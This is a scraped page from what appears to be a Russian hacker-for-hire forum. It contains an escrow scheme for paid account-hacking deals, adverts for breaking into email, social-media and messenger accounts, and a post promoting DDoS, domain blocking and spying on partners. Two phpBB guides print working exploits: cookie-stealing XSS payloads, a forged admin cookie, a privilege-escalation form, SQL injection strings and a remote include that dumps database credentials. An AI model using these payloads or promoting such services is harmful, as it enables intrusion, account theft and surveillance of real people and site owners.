Перейти к содержимому


Самый популярный контент


#246 Как провести безопасную сделку?

Написано Admin : 28 Февраль 2016 - 08:42

s1ojKdKrVa0.jpg
gar2.jpg

Приветствую, дорогие посетители и пользователи форума, в связи с последними событиями и многочисленным кидаловом людей, мы решили вести прямую борьбу с этим беспределом и создали открытый сервис как для клиентов так и для специалистов.

Кому будет интересна безопасная сделка и в чем ее гарантии?
Тут все просто, Вы заказчик, не можете доверить сумму исполнителю и хотите работать без предоплаты, в свою очередь исполнитель тоже тратит средства на работу и не может быть уверен в Вашей стороне и по любым другим причинам не хочет выполнять заказ без платежа.
Лучший выход тут - безопасная сделка.90% возврата и выплаты средств любой стороне.

Преимущества сделки в том, что ни администратор, ни заказчик, ни исполнитель не смогут внести никаких поправок в сделку, все предельно честно, если работа не выполнена - средства на возврат, если выполнена - средства на выплату.
Схема работы: Заказчик ----> создание личного сообщения администратору-----> оплата в фонд форума ------> получение результата
Исполнитель -----> подтверждение в теме (которая будет создана администратором для сделки) ------> выполнение работы ------> получение средств.
МЫ НЕ ЯВЛЯЕМСЯ ГАРАНТОМ!!! Гарант - это схема не совсем честная, будьте бдительны!
Основные правила:

1. Сделку может провести абсолютно любой желающий пользователь и гость форума.

2. Все сделки и договоренности заключаются напрямую с исполнителем и клиентом, без участия третьей стороны, при условии открытии сделки на общее обозрение команде и пользователям форума
(по желанию заказчика соответственно).

3. Клиент и исполнитель обязаны действовать строго по заявке (см. ниже)

Заказчик или исполнитель создает сообщение администратору сайта с названием сделки например:

Тема: Взлом вконтакте
Текст: Совершаю сделку с пользователем admin (указывает ник исполнителя) , по услуге взлома вконтакте (описываете суть сделки), с правилами форума ознакомлен и согласен. Комиссию в фонд форума оплачиваю я. Сумма сделки: 1 0000 рублей. Сроки работы : 2 дня. (Это пример!)


После второй оппонент сделки обязан отписаться, что принимает условия форума и подтверждает сделку.
Администратор подтверждает и одобряет сделку, сразу после оплаты суммы в фонд форума с комиссией. Сумма из фонда выплачивается исполнителю сразу, после Успешно выполненной работы.

4. Отвественность за сделку несет только сам заказчик и исполнитель, Администратор выполняет роль куратора сделки, но никаким образом не имеет к ней отношения.

5. Клиент либо исполнитель оплачивают единоразовый взнос в размере 10% за услуги безопасной сделки в фонд команды форума.

Наши гарантии :

1) Пройдена идентификация во всех платежных системах. (Webmoney, Yandex, QIWI, PM)
2) Чистая репутация с 2011 года, есть на всех закрытых площадках.
3) Принимаем оплату наличными и оплата любым удобным способом в платёжные системы.
4) Предоставим любые рекомендации нашей порядочности заинтересованным клиентам.

Запомните, мы отличаемся от гарантов, мы только курируем сделку,которая открыта всем оппонентам, благодаря этому, тут не может быть обмана, т.к все видят как завершилась сделка.

Ответы на вопросы:

1. Как заказать услуги хакера, чтобы меня не кинули?
- Создаете тему (сообщение Администратору) , по заявке написанной в верху данной темы, и ждете одобрение Администратора.
После того, как Администратор одобрил тему он вам предоставляет пароль от закрытой комнаты где и будет проходить сделка, находится там должны Администратор, вы и исполнитель. Оплачиваете взнос в фонд и исполнитель может начинать работать.
2.Может хакер как-то кинуть меня или обмануть через данную систему?
-Нет, ни Вы, ни хакер не смогут нарушить условия честной сделки, для этого любая сделка открыта для общего просмотра (На усмотрение клиента!) и ее курирует Администратор.
3. Что значит сделка открыта? Все смогут наблюдать каков мой заказ?
-Сделка открыта для большинства людей (рекомендуем закрытые комнаты), но всю приватную информацию (ссылку на анкету, сайт, почту и пр) видите только, Вы и хакер.
4. Для чего сделали открытые сделки?
- Для того, чтобы большинство людей видели как работает наша команда и борется с кидаловом. Открытые сделки помогают сохранить чистоту процесса и большинству пользователей подобрать нужного кандидата сделав вывод по его закрытым сделкам.
5. Что значит открытая и закрытая сделка?
- Открытая сделка - это когда вы дали заявку на работу и исполнитель ее подтвердил, но она еще в стадии выполнения. Закрытая сделка - это когда исполнитель выполнил работу и вы ее приняли без претензий.
Закрытые комнаты для сделок это отдельный форум где происходят сделки под контролем Администрации сайта. Другие пользователи не видят и не имеют доступа к вашему личному заказу (если для вас это важно)
6. Могу ли я приглашать исполнителей не являющимися пользователями вашего форума?
- Да, мы только приветствуем такого рода решения.
7. Каким образом я могу сделать оплату в фонд форума?
- Мы принимаем любой удобный для вас способ оплаты.
8. Я должен оплатить сумму работы вам? Чем вы отличаетесь от гаранта?
- Верно, вы оплачиваете сумму работы в фонд форума, что является гарантией для исполнителя,что вы платежеспособный клиент. Для вас гарантия в том, что сможете забрать средства в любой момент, так же исполнитель не получит средства до окончания работы и вашего согласия. Сумма в полном размере передается исполнителю, ТОЛЬКО ПОСЛЕ ЗАВЕРШЕНИЯ РАБОТЫ.
Наше отличие от гаранта в том, что мы открываем сделки для просмотра, по желанию заказчика, чтобы пользователи не сомневались в безопасности и знали, что в любой момент могут прекратить сделку и вернуть свои средства.


P.S Перевод на банковскую карту,осуществляется по запросу заказчика - Основателю форума,Через ЛС Возврат денежных средств осуществляется только по заявке заказчика, и переводится только на те реквизиты с которых производилась оплата!
Срок возврата осуществляется в течении 3-5 часов,с момента подачи заявки!
Подать заявку на сделку через гарант вы можете по этой ссылке:
https://xakertop.net...romMemberID=133

gar2.jpg




#42 Реклама на форуме.

Написано Admin : 24 Ноябрь 2015 - 04:27

Информация рекламнадателям!
Если вы решили разместить рекламу на нашем форуме в виде Банера на всех страницах форума, либо пометить ваше объявление как "Важное" и так далее,

просьба обращаться на почту:

[email protected]
Telegram: http://t.me/xakertop_bot

Прикрепленные изображения

  • image-2.jpg
  • image.jpg



#14 phpBB

Написано Admin : 23 Ноябрь 2015 - 11:11

1) Хочу понять, как же взламываются форумы phpbb.
 
Их можно взломать 5 способами:
1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
2) Получить доступ к аккаунту администратора.
3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
4) Взлом через моды.
5) Взлом через sql инъекцию.
2) Как получить аккаунт администратора на форуме?
 
1) Угадать, украсть, спросить.
2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.
xss для форума phpbb. Почти все найдены White Jordan.
[c*olor*=#EFE*FEF][forbidden link][/UR*L]  phpbb 2.0.17 Рушиться структура, код надо доработать[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg] [*url]ww*w.ut[forbidden link][/u*rl]' [*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]
 
пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.
 
3) Получение админского аккаунта через багу в куках.
phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D
 
И мы становимся админом (если форум не пропатчен).
3) Как происходит взлом?
1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum.../CHANGELOG.html
Смотрим какая там последняя версия и прибавляем единицу.
2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.
Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.
3) Проверяем форум на sql уязвимости.
Делаем запросы:
Если сработало, то добываем хеш админа, расшифровываем.
4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.
запросы:
Запросы для получение привилегий найдете на секьюрити порталах.
5) Взлом через xss.
 
4) Как узнать серверный путь форума?
http://site.ru/forum...erlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных
 
Пути для форумов <2.0.10
5) Как узнать префикс таблиц базы данных?



#930 Партнеры по продвижению.

Написано Admin : 04 Июль 2016 - 08:33

Доброго времени суток уважаемые пользователи и гости.
Форум хакеров приветствует вас.
Хотелось бы поблагодарить наших партнеров, которые трудятся во благо форума на разных площадках интернета, российские сайты и не только. Сегодня выложу ссылки на страницы и группы на зарубежных площадках, таких как:
http://fb.com

http://plus.google.com

http://twiter.com

В дальнейшем пополним базу и российскими ссылками на страницы и группы которые созданы для развития форума.

Прикрепленные изображения

  • top-5-haker-programm.jpg



#342 Услуги профессиональных хакеров.

Написано Admin : 04 Май 2016 - 11:07

УСЛУГИ ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ.
Рад приветствовать каждого пользователя который перешел на xakertop.net Сегодня решил обсудить по-видимому достаточно популярную тему. В которой будем вести обсуждение хакеров и услуги которе они предоставляют. Большая часть сюда перешли в надежде найти специалиста который оказал бы подобные услуги! Я уверен если вы по юзаете мой форум обязательно найдете такого человека. Мир в котором интернет технологии развиваются с бешеной скоростью услуги подобного рода имеют большую актуальность. Практически 70% современного бизнеса услуг связанно с рекламой в глобальной сети.Конкуренция между бизнесменами растет буквально по часам, многие желают применить хитрости и обратиться за помощью к специалистам.Даже пренебрегая законодательством Российской Федерации, давайте рассмотрим основные услуги этого рынка: Блокировка доменных имен: Зачастую возможная конкуренция разворачивается между сайтами. Которые пытаются вылезти в топовые позиции поисковых систем.Пренебрегая рядом фактором соперники готовы на любые шаги! Один из лучших вариантов заставить отступить своего оппонента. Заблокировать домен его сайта, во-первых это отразится на всей СЕО компании примененной к сайту! Во-вторых, подобные действия испугают вашего врага от подобных посягательств на клиентов. ДДос атаки: Еще один вариант опустить конкурента с небес на землю, обращаясь к хакеру за услугами досс. Вы гарантированно получаете временное отсутствие потенциального недруга в сети. Преобладая в поиске в это время.Отметим заблокировать домен выйдет достаточно дешевле чем, постоянно пользоваться досс атаками.Удаление негатива: За годы работы в сфере хакинга, ко мне обращались различные люди с различными проблемами. Частенько были соотечественницы жившие в Европе или Соединённых Штатах Америки. Засветившиеся на порталах связанных с порнографией. Приходилось удалять всю информацию, которую оставляли бывшие работодатели девушек.Личности с просьбой удалить фейковый аккаунт в tweetr и других социальных сетях. Подобные услуги хакеров стоят достаточно хорошо, и многим увы не по карману.Удаления негативно содержащего видео на youtube, администрации лояльно относится к видеозаписям содержащим информацию о какой-либо личности. Вспоминаются на моей памяти и негативные клиенты! Помните по всей стране ходили видео с большим накаченным скинхедом по имени ТЕСАК? Занимался он ловлей педофилов на живца, после чего избивал недолюдей и выкладывал запись в всемирную паутину.За лето когда этот парень проявлял максимальную активность ко мне обратились десятки педофилов с просьбой удалить и заблокировать аккаунт. Сейчас я подобным вещами не занимаюсь, скажу откровенно я их обманывал! Удалял запись, получал оплату сразу же восстанавливал!Считая действия этих людей аморальными, думаю я имел на это полное право и гражданскую позицию!Удаление отзывов:Пакости ненавистников и конкурентов, оставляют негативную информации о честных людях в интернете!Найти проверенного хакера который произвел удаления подобных тем достаточно тяжело. Необходим специалист оказывающий услуги не первый год своим клиентам. Представьте обыкновенный риэлтер, честный оказывающий не дорогие услуги. В общем пользующейся спросом знаток своего дела. Создается простая тема на форуме, и начинаются зарисовки негативных отзывов. Мол дилетант, обманул меня на кругленькую сумму! Если завистник вашей популярности заходит достаточно далеко, таких сообщений может быть очень много! Когда тема появляется в индексе сделать практически не чего нельзя. Особенно когда администрация форума не активна или принципиальна!Приходится пользоваться услугами специалистов, в данном случае хакеров. Платить деньги не понятно за что! Взлом социальных сетей: Нанять хакеры для взлома вконтакте или одноклассников, рядовое занятие! Тысячи людей пытаются сделать это ежедневно.Проверить любимую девушку на верность, или с кем общается ваш парень обыдённые причины обращения к программистам самоучкам.Читать мессенеджеры сообщений:Смартфоны, определить место расположение и многое другое. Все это под силу сделать обыкновенному взломщику. Вибер и whatsapp, стремительно завоевывают место подобных приложений в нашем обществе. Судя по росту выходит достаточно удачно! Русский человек от природы любит халяву, вибер и есть бесплатный вариант отправлять сообщения пользователям по всему миру! Как правильно заказать услуги у хакеров:Все большую актуальность подобные услуги взлома обретают у человечества в целом. Многие понимая этот факт, но не имея возможность предоставить их! Становятся мошенниками, обманывающими рядовых граждан.Расскажу принцип работы с хакерами без обмана:
№1. Обращайте внимание на опыт работы этого человека, если по каким либо причинам у вас хакер требует оплату в перед, это совсем не означает что он мошенники, сейчас многие работают по предоплате. Почему объяснять здесь не могу, спросите у тех кто предлагает услуги и если ответ вам покажется адекватным то и развернутым вы всё поймете. Если же начинаются отговорки не дающие нормального ответа на вопрос, то советуем предложить работу через гаранта.
№2. Предлагайте работать через гарант сервис, работая через гарантов у вас будет возможность получить услуги которые вы заказывали!Честный и профессиональный гарант стоит достаточно не дорого. Порядка 7% от суммы сделки.Если исполнитель согласился работать через гаранта это уже характеризует его с положительной стороны.
№3 Как правило, старайтесь просить предоставить доказательства выполненной работы, только после этого следует уведомить гаранта о завершении сделки!

Прикрепленные изображения

  • 8f718ec85c8d2b0f45effbfb13a458ac.png



#344 Черный список.

Написано Admin : 04 Май 2016 - 12:02

Доброго времени суток уважаемые гости и друзья форума опытных хакеров! Сегодня я хочу предложить список самых популярных кидал в сфере взлома на заказ. Если вас обманули, пиши контакты хакера в теме!!!!! Сортировка по email: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] aooyes.com [email protected] [email protected] [email protected] [email protected] algonco.com [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] vzlom-odnoklassnikov.net [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] vzlom-na-zakaz.com [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] vzlomseti.my1.ru vzlomvkontakte.net [email protected] vzlomzona.narod.ru [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] zakaz-vzloma.net [email protected] [email protected] zakazvzloma.com [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] forum-hackeroff.ru [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] grinahack.ru [email protected] [email protected] [email protected] [email protected] hack-pass.com [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] HardBass09.p.ht [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] JABBER: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] mail–[email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] moikontakty.narod.ru [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] Сортировка по Skype: abra-kadabra67 abrcadabr67 brytto_joker de7phi good-hack HaksOpen haker20151 KENIROKEN kioto9112 MailsWizard marina_ernest miedkov89 Nikita-popov93 nindeti Skype Pavel_Hakk powerofhack shOrtle shket30144 tx4hack vasya2010z vzlom_hack [email protected] vzlom2012 xakermen.xakermen [email protected] Сортировка по icq: 111-111-463 180-220 197-79-33 217-627 220-772 222-84-82 276-71-73 318-319 354-599-095 379-892 403-99-00 465-229-798 474-622-857 479-614 551-837 555-333-777 561-658-721 564-455-785 576-432 576-99-00 577-668-445 589-999-71 602-374-488 603-403-038 605-349-067 605-511-466 611-926-090 615–942-753 616-963-483 617-985-842 623-478-760 633-133-323 633-376-723 633-684-500 649-008-31 650-952-099 654-547-171 655-534-448 656-955-368 657-964-762 667-038-788 675-608-888 677-000-002 681-355-178 681-813-681 684-801-171 688-023-196 692-753-919 696-213-359 943-494-60 996-032 998-98-98 Сортировка по вконтакте: vk.com/id231591923 vk.com/id250053527 vk.com/id126683114 vk.com/id86157862 vk.com/id126683114 vk.com/id226365874 vk.com/id312650110 vk.com/id329445437 vk.com/id38168233 vk.com/ck944 vk.com/dyhaa vk.com/grinahack vk.com/hak.pro81 vk.com/hakervzlom2015 vk.com/lisaveta7 vk.com/mskk2 vk.com/powerofhack vk.com/giprof vk.com/vladimirfedorov88
[email protected]

Если вы нашли хакера к которуму хотели обратиться в этом списке советуем вам предостерегаться! Соблюдайте правила! №1. ПОЛЬЗУЙТЕСЬ ГАРАНТОМ! И ЧИТАЙТЕ xakertop.net (ФОРУМ ХАКЕРОВ И ПРОГРАММИСТОВ)

Прикрепленные изображения

  • 1450969123.jpg



#141 УСЛУГИ ВЗЛОМА СТРАНИЦ ПОЧТЫ И ДЕТАЛИЗАЦИЯ СМС. ОПЫТ РАБОТЫ, РАЗУМНЫЕ ЦЕНЫ.

Написано Xaker : 15 Февраль 2016 - 10:20

Приветствую вас Уважаемые клиенты.
Предлагаю услуги взлома страниц, социальных сетей,таких как:
Одноклассники, Vk.com, Facebook и др.
Взлом почты любых почтовых серверов, таких как:
Яндекс (Yandex), Гугл (google),
Mail.ru он же (Мой мир), Рамблер (rambler) и др.
А также выполняю детализацию смс мобильного
любых операторов сотовой связи,
детализация Skype, Viber, WhatsApp и другие.
Быстро качественно, надежно.
Опыт работы с 2009года,
работаю по сегодняшний день и не собираюсь прекращать.
Разумные цены на услуги, опыт. Обращайтесь.

КОНТАКТНЫЕ ДАННЫЕ

Почта:√
[email protected]



Сайт:
http://xaker.rolfor.ru/



ВНИМАНИЕ!
УВАЖАЕМЫЕ ПОЛЬЗОВАТЕЛИ
УБЕДИТЕЛЬНО ПРОСИМ ВАС.
ОБРАЩАТЬСЯ. НЕПОСРЕДСТВЕННО
ПО ТЕМ КОНТАКТНЫМ ДАННЫМ,
КОТОРЫЕ. МЫ УКАЗАЛИ ВЫШЕ,
В ОПИСАНИИ ТЕМЫ!
В случае если вы обращайтесь по контактным данным, которые оставил кто-то другой в комментариях, вы рискуете стать жертвой мошенников, мы не несем ответственности за это. Будьте внимательны!

Прикрепленные изображения

  • 1461058277610.jpg



#13 Все о phpBB x.xx, Уязвимости.

Написано Admin : 23 Ноябрь 2015 - 11:10

1.4.2 version: 
--
Cross Site Scripting:
Cross Site Scripting позволяет нападающим вставлять JavaScript код (и другой код HTML) в существующие сообщения. 
Пример:
{img}javascript:alert('This is the test'){/img}
--
 
1.4.4 version:
--
DoS и нарушение структуры базы данных:
Уязвимость существует в выполнении phpBB's BBcode ({code}{/code},{quote}{/quote},{list}{/list}).
Добавление строки ‘0000000’ внутри одного из этих тэгов, приведет к 100% потреблению ресурсов памяти и процессора на уязвимом сервере и к нарушении структуры базы данных.
Пример: 
1. {code}'0'*800{/code} 
2. {code}0{code}0{code}0{/code}0{/code}0{/code}
--
 
2.0.0 version:
--
Межсайтовый скриптинг: 
Уязвимость защиты в программе позволяет удаленным нападающим вставлять злонамеренный HTML и JavaScript код в существующие web-страницы внутри тэга IMG специальной конструкции:
 
{img}http://a.a/a"onerror="javascript:alert(document.cookie){/img}
--
Повышение привилегий:
Уязвимость позволяет пользователю с учетной записью "user" поднять свои привилегии до уровня "administrator", тем самым получая полный контроль над управлением форума. 
 
Ошибка присутствует в сценарии admin_ug_auth.php (используется для установления разрешения). Для просмотра защищенных страниц сценарий способен ограничить доступ непривилегированным пользователям, но он не производит такую проверку при отправлении назад данных. Демонстрационный код:
<html><head></head><body> <form method="post" action="http://domain_name/board_directory/admin/admin_ug_auth.php">User Level: <select name="userlevel"><option value="admin">Administrator</option><option value="user">User</option></select><input type="hidden" name="private[1]" value="0"><input type="hidden" name="moderator[1]" value="0"><input type="hidden" name="mode" value="user"><input type="hidden" name="adv" value="">User Number: <input type="text" name="u" size="5"><input type="submit" name="submit" value="Submit"> </form></body></html>
Далее отредактируйте действие формы в этом коде, измените местоположение admin сценария. Обычно, он находится в подкаталоге /admin/. Затем вызовите код в локальном окне браузера, и введите номер неадминистративного пользователя. Нажмите submit. При следующем заходе, вы получите права администратора.
--
 
2.0.2 version:
--
Административный доступ:
Обнаружена возможность изменения SQL запроса. Удаленный пользователь может получить хеш пароля администратора и, используя его, получить полный контроль над PHPbb системой. 
 
Уязвимость обнаружена в сценарии page_header.php.
Например, чтобы взломать user_id '40', запросите следующую страницу: 
 
forum_id=1+or+user_id=40+and+mid(user_password,1,1 )=char(97)/*[
 
В результате запрос будет выглядеть следующим образом: 
 
SELECT u.username, u.user_id, u.user_allow_viewonline, u.user_level, 
s.session_logged_in, s.session_ip FROM phpbb_users u, phpbb_sessions s WHERE 
u.user_id = s.session_user_id AND s.session_time >= 1035778374 AND s.session_page = 
1 or user_id=40 and mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC, 
s.session_ip ASC
 
Имя администратора системы можно просмотреть вверху списка пользователей внизу страницы форума. Далее добавляя хеш пароля в куки, можно войти на сайт как администратор системы. Например, если user_id равен 32360, и хеш пароля - 6a204bd89f3c8348afd5c77c717a097a, то атакующий должен добавить следующее значение: 
a:2:{s:11:"autologinid";s:32:"
6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:5 :"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 *
Затем urlencode() это и поместите в куки с переменной 'phpbb2support_data', затем обратитесь к административной странице на phpbb сайте. Демонстрационный эксплоит: 
 
http://{target}/phpBB/prefs.php?HTTP_POST_VARS{save}
=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0& smile=0&dishtml=0&disbbcode=0&themes =1?=/../../../var/logs/apache/access.log%00&save=1&user=admin&submit=Save%20Pref erences
--
2.0.3 version:
--
Выполнение произвольного PHP кода:
Уязвимость позволяет удаленному атакующему внедрить путь к 'extension.inc' в сценарии 'quick_reply.php'. В результате, атакующий может внедрить произвольный PHP сценарий из своего источника, который может использоваться для выполнения произвольных команд на Web сервере. Пример:
Создаем сценарий 'extension.inc' на удаленном сервере:
<?phpinclude('config'.'.php');echo "DB Type: $dbms <br>";echo "DB Host: $dbhost <br>";echo "DB Name: $dbname <br>";echo "DB User: $dbuser <br>";echo "DB Pass: $dbpasswd <br>";exit;?>
Затем запрос:
Раскроет содержание базы данных форума. 
--
Межсайтовый скриптинг:
Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример:
<html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/>  </form> <script> search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script>'; document.search.submit(); </script> </body> </html> 
--
SQL Injection:
phpBB пользователь может посылать приватные сообщения другим пользователям. Обнаруженная уязвимость позволяет пользователю удалить текст всех приватных сообщений, сохраненных в системе.
 
Функция для удаления приватных сообщений уязвима к SQL инъекции. Если мы представляем данные, в которых мы хотим удалить приватное сообщение с номером ‘1) OR 1=1 #’, текст всех сообщений будет удален.
 
Сообщения хранятся в двух таблицах, и SQL инъекция будет воздействовать только на одну из них, так что будут удалены все тела сообщений, а темы и метаданные будут удалены, если они принадлежат текущему пользователю. Это означает, что темы удаленных сообщений все еще можно обнаружить в папках других пользователей. огда пользователь нажимает на такое удаленное сообщение, он будет переадресован назад к папке. 
 
Вы можете эксплуатировать это, отправляя(POST) следующее значение к privmsg.php?folder=inbox*sid = {SID}: 
 
mode=""
delete="true"
mark{}="1) OR 1=1 #"
confirm="Yes"
текущее значение SID можно увидеть в URL полях, если вы вошли в систему с отключенными куки.
--
 
2.0.5 version:
--
Межсайтовый скриптинг:
Удаленный пользователь может выполнить XSS нападение. 
Сообщается, что форум не фильтрует HTML код в переменной topic_id в сценарии viewtopic.php. Удаленный пользователь может сконструировать специально обработанный URL, содержащий произвольный HTML код, который будет выполнен в браузере пользователя, просматривающего эту ссылку, в контексте уязвимого сайта. Пример: 
http://{site}/phpBB/viewtopic.php?topic_id={script}
Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого пользователя.
--
SQl инъекция:
Удаленный пользователь может выполнить нападение SQL инъекции. 
Сценарий 'profile.php' не проверяет переменую 'u'при отображении профиля пользователя. Удаленный пользователь может представить специально сформированный HTTP Get запрос, чтобы выполнить произвольные SQL команды на основной базе данных. 
Пример/Эксплоит: 
http://{target}/profile.php?mode=viewprofile&u='{sqlcode
--
 
2.0.5 version + MySQL 4:
--
SQL инъекция:
Уязвимость в проверке правильности ввода обнаружена в PHPbb. Удаленный пользователь может получить хеши паролей пользователей, включая администратора системы, и затем декодировать их. 
Сообщается, что сценарий viewtopic.php не проверяет данные, представленные пользователем в переменной $topic_id, перед выполнением SQL запроса. Удаленный атакующий может представить специально обработанное значение для этой переменной, чтобы выполнить дополнительный SQL запрос и получить произвольные данные их MySQL базы данных, включая MD5 хеши паролей пользователей форума, включая администратора системы.
 
Exploit: [here!] (2.0.5+MySQL4.perl.txt)
--
 
2.0.6 version:
--
Межсайтовый скриптинг:
Удаленный атакующий может вставить произвольный HTML код в тело сообщения. 
Удаленный атакующий может вставить специально отформатированный BB тэг (bbcode) {url}{/url}, чтобы заставить форум отобразить произвольный код сценария в браузере пользователя, просматривающего злонамеренное сообщение. 
Пример/Эксплоит: 
{url=www.somename.ru" onclick=alert('Hello')}text{/url}
{URL=http://www. somename.ru" onclick="alert'Hello'}text{/URL} 
{URL=www. somename.ru" onclick="alert'Hello'}text{/URL}
--
Межсайтовый скриптинг:
Удаленный авторизованный администратор может выполнить XSS нападение против других администраторов форума. 
Удаленный администратор может сконструировать специально обработанную smiley панель таким образом, чтобы выполнить произвольный код сценария в браузере другого администратора, просматривающего эту панель. 
Пример/Эксплоит: Поместите в smiley панель: 
 
<script>alert('Css work')</script>
 
--
SQL иньекция:
Удаленный пользователь может внедрить SQL команды, чтобы получить административный доступ к приложению. 
 
Как сообщается, сценарий 'search.php' не достаточно проверяет параметр 'search_id'. Удаленный пользователь может послать специально обработанное значение, чтобы выполнить произвольные SQL команды на целевом сервере, например, чтобы получить хэши паролей администратора. С хэшами паролей, удаленный пользователь может изменить свои куки, чтобы получить доступ к системе. Воздействие уязвимости зависит от версии используемой базы данных MySQL. 
 
Для определения уязвимости, выполните следующий запрос: 
 
Если ваша система уязвима, то запрос выдаст SQL ошибку: 
 
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that 
corresponds to your MySQL server version for the right syntax to use near ' AND 
session_id = '9c9052fd135c0cefb31ec4b5124060f7'' 
 
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 AND session_id
= '9c9052fd135c0cefb31ec4b5124060f7'
Line : 693
File : /usr/local/www/data/phpBB2/search.php
Эксплоит (боле подробное описание см. в источнике сообщения) (работает только в MySQL 4.x!): 
 
(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114 ,99,104,95,114,101,115,117,108,116,
115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58 ,34,116,111,116,97,108,95,109,97,116,
99,104,95,99,111,117,110,116,34,59,105,58,53,59,11 5,58,49,50,58,34,115,112,108,105,116,
95,115,101,97,114,99,104,34,59,97,58,49,58,123,105 ,58,48,59,115,58,51,50,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115, 111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114, 34,59,115,58,52,58,34,68,69,83,67,34,59,
115,58,49,50,58,34,115,104,111,119,95,114,101,115, 117,108,116,115,34,59,115,58,54,58,34,116,111,112
,105,99,115,34,59,115,58,49,50,58,34,114,101,116,1 17,114,110,95,99,104,97,114,115,34,59,
105,58,50,48,48,59,125))%20from%20phpbb_users%20wh ere%20user_id={id}/*
--
SQL инъекция:
Удаленный авторизованный модератор может внедрить произвольные SQL команды. 
 
Сообщается, что функция 'groupcp.php' не проверяет правильность данных, представленных пользователем в $sql_in переменной. Удаленный авторизованный пользователь с 'moderator' привилегиями может представить специально обработанный URL, чтобы выполнить произвольные команды на целевом сервере.
--
Sql инъекция:
Уязвимость обнаружена в phpBB в 'search.php'. Удаленный пользователь может выполнить произвольные SQL команды. 
 
Уязвимость обнаружена в 'search.php' в параметре 'show_results', кода переменная $show_results не установлена к 'posts' или 'topics'.
 
Exploit: [here!] (2.0.6.perl.txt)
--
 
2.0.6c version:
--
Межсайтовый скриптинг:
